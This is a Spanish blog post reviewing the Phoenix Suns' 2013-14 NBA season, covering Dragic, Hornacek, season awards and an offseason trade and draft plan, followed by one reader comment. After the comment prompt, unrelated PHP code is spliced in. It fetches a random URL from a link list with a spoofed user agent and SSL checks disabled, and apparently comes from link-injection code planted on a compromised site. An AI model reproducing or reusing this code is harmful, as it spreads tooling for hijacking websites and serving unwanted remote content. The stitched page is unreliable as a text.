Phoenix Suns: Sobresaliente

23 de June de 2014 por Simon

Han sido sin duda la gran sorpresa de la temporada. En sólo una temporada y sin encontrar demasiadas explicaciones han pasado de ser considerados peor equipo de la conferencia a uno de los más prometedores. Han estado a punto de colarse en las eliminatorias por el título cuando en la previa un servidor les propinaba un palo tras otro  y les auguraba menos de 30 victorias. No es que nosotros tuviéramos muy mal ojo al proyectar a estos Suns sinó que absolutamente nadie esperaba la temporada que se han sacado de la chistera Hornacek y sus chicos. Todo lo mal que lo hicieron la temporada pasada con un equipo a priori más prometedor y preparado lo han hecho bien en esta campaña.

Al primero que vamos a mencionar particularmente es a Jeff Hornacek, el técnico que más cerca se ha quedado del gran Popovich en las votaciones por el COY. No es para menos, ha convertido un equipo de retales en un proyecto ilusionante, que entretiene a la gente y encima gana. Ha sido uno de los mejores equipos de la temporada en ataque y su banquillo ha aportado como el que más con una lista de jugadores que a principio de campaña parecía la de un equipo de D-League . 

El gran artífice sobre la pista ha sido el esloveno Goran Dragic, que esta temporada nos ha enamorado a todos con su capacidad para comandar a este equipo y su forma de anotar y decidir los partidos. Un salto de calidad que muchos llevábamos tanto tiempo esperando que más de uno había perdido la paciencia y había acabado por considerarle un buen titular capaz de aportar a su equipo pero sin capacidad de asumir responsabilidades mayores. Su gran temporada no ha pasado desapercibida para nadie menos para la propia NBA que no se acordó de él ni para el All-Star y lo relegó al tercer equipo en los quintetos de la temporada.Eso sí, el premio “Jugador más mejorado” lo ganó por goleada. Dragic ha formado una pareja explosiva con Eric Bledsoe que empezó como un tiro la campaña y al que el menisco externo de la rodilla derecha lo ha tenido parado la parte central de la temporada. No obstante, el joven base ha demostrado que es un gran jugador y que encaja perfectamente con Goran Dragic. Ambos son la pareja del futuro de estos Suns. Escoltando a estos cracks ha aparecido Gerald Green, otro jugador sobre el que siempre se habían tenido grandes expectativas pero que tras su paso por los Pacers había sido catalagoda casi definitivamente como un saltarín . Esta temporada ha destapado todo su talento y se ha convertido en el tercer hombre de Phoenix (segundo en muchos partidos por la lesión de Bledsoe), y nos ha dejado un buen número de exhibiciones. Uno de los mejores sextos hombres de la campaña.

Pero estos Suns no han sido sólo este trío magnífico de guards. Junto a ellos ha funcionado a la perfección un conjunto de jugadores que ha suplido las carencias del equipo con empuje, coraje y sobretodo mucho desparpajo. Se tenían muchas esperanzas en la gran apuesta del draft, Alex Len, pero el ucraniano no ha demostrado absolutamente nada esta campaña en buena parte por culpa de las lesiones. Su lugar lo ha ocupado Miles Plumlee que como Green pasó desapercibido en Indiana pero que en Arizona ha dado un rendimiento brutal con guarismos cercanos al doble-doble en anotación y rebote. Acompañándolo en la pintura estuvo Channing Frye que una vez recuperado de sus dolencias cardiacas ha vuelto a aportar sus singulares atributos para ser un pívot. Los hermanos Morris han demostrado que tienen un sitio importante en la liga como suplentes de garantías, sobretodo Markieff. También vital fue a aportanción de PJ Tucker, pegamento del equipo y enorme “currante”, aportando siempre por encima de sus capacidades. El resto de jugadores han tenido un papel muy reducido en los esquemas de Phoenix pero cuando han jugado han sabido cumplir.

Un equipo confeccionado prácticamente en su totalidad por descartes de otros equipos, a punto ha estado de colarse en los Play Off del salvaje Oeste. Tras mantenerse toda la temporada en puestos de Play Off , el gran final de campaña de Dallas Mavericks y Memphis Grizzlies les dejaron con la miel en los labios y sin el que hubiera sido un excelente premio al trabajo de todo el curso. Ahora toca mirar al draft de este jueves en el que tienen varias elecciones para continuar creciendo y reforzarse de cara a las empresas mayores que afrontará el equipo en las próximas campañas.

PREMIOS

MVP: Como ya hemos comentado el rendimiento de Goran Dragic ha sido brutal durante todo el año. Más allá de sus números (20.3 p, 5.9 a, 1.4 robos, 54% TC) lo realmente importante ha sido su liderazgo y su ascendencia sobre el resto de sus compañeros.

Rookie: Todos sabíamos que por una causas o por otros el primer año de Alex Len y Archiee Goodwin sería complicado. Los dos han tenido sus momentos pero ha de ser en este temporada que ahora comienza en lq ue empiecen a dar muestras de su talento.

Sorpresa: Prácticamente todos los jugadores de la plantilla se merecían este galardón pero se lo vamos a dar a Jeff Hornacek. No creo que nadie esperara que un técnico novel fuera capaz de liderar este proyecto a las cotas que lo ha hecho él. Ha sido el tercer jugador de la historia nominado jugador y técnico del mes en su carrera (los otros: Larry Bird y Larry Drew)

Decepción: Me alegra dejar este premio vacante, señal de que todos los jugadores han aportado lo que se esperaba o incluso más. En todo caso la decepción de la temporada ha sido la de no conseguir finalmente el premio de los playoffs. Todos nos habíamos hecho un poquito de los Suns.

JUGANDO A GM

Primero y principal, hay que asegurar la renovación de Eric Bledsoe. Igualar lo que llegue por él.

PJ Tucker termina contrato pero un 2×3 lo haría renovar con los ojos cerrados. Otro que podría terminar contrato es Channing Frye, que tiene una player option de casi 7 millones. Si no acepta una oferta de 4×3 y quiere cobrar esos 7 millones habrá que dejarle claro que aunque es una pieza valiosa para nuestro equipo tendríamos que buscarle una salida. Será un expiring interesante.

Tenemos las elecciones 14, 18, 27 y 50 del draft. Si a la 14 llegara Aaron Gordon sería perfecto pero es más que improbable. Seguramente serán jugadores como James Young o Rodney Hood los que estarán disponibles a estas alturas. En ese caso el elegido sería Young que cubriría el puesto de alero, el más flojo del equipo, aportando lanzamiento externo y un gran potencial defensivo. Creo que viene como anillo al dedo a este equipo y sus sistemas.

En la 18, una vez reforzado el equipo en su posición más débil habrá que buscar un interno que aporte defensa y rebote pero si estuviera disponible Dario Saric, drafteariamos por talento. Es casi imposible pero los rumores que apuntan a que puede quedarse en Europa un par de años si no lo escogen Celtics o Lakers le está haciendo caer bastante en algunos mocks. Si los Bulls van en serio a por Carmelo Anthony necesitarán hacer hueco salarial para poder ofrecerle el máximo por lo que no tendrán más remedio que desprenderse de Taj Gibson. Marcus Morris + el pick 18 sería la oferta. Los Bulls conseguirían un ala-pívot válido como Marcus Morris para sustituir a Gibson y dispondrían de dos elecciones de draft consectivas (18 y 19), además del ahorro económico para poder hacer más movimientos.

La 27 trataría de cambiarla por una elección de años posteriores.

La elección 50 apenas puede tener valor pero Russ Smith sería una elección fantástica para cogerlo tan abajo.

Después de las renovaciones y el Draft aún nos queda espacio para traer algún agente libre importante. Greg Monroe será el objetivo claro. Si convencemos a Frye de bajar su contrato, tendremos lo justo para ofrecer el máximo a Monroe una cifra que podría ser imposible de afrontar por parte de Detroit.

Así nuestra plantilla sería la siguiente:

Base: Dragic, Russ Smith, Ish Smith.
Escolta: Bledsoe, Green, Goodwin.
Alero: Young/Hood, PJ Tucker
Ala-Pívot: Gibson, Markieff Morris, Frye
Pívot: Monroe, Plumlee, Len.

Comenta

Un comentario a esta entrada

  1. jmpa dice:
    #1

    Me he hecho un poco de Suns este año. Aparte de que mi hermano es fan de ellos desde la época de Sir Charles.
    Ha sido increíble lo que han logrado este año.
    Ojalá elijan bien en el draft y puedan pescar algún agente libre de calidad.

    Es improbable, pero Pau les vendría muy bien. Un PF que entiende perfectamente el juego y sabe pasar sería un complemento ideal. Aparte de que no tendría que jugar de alero ni a 6 metros del aro, como le han hecho este año en L.A.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>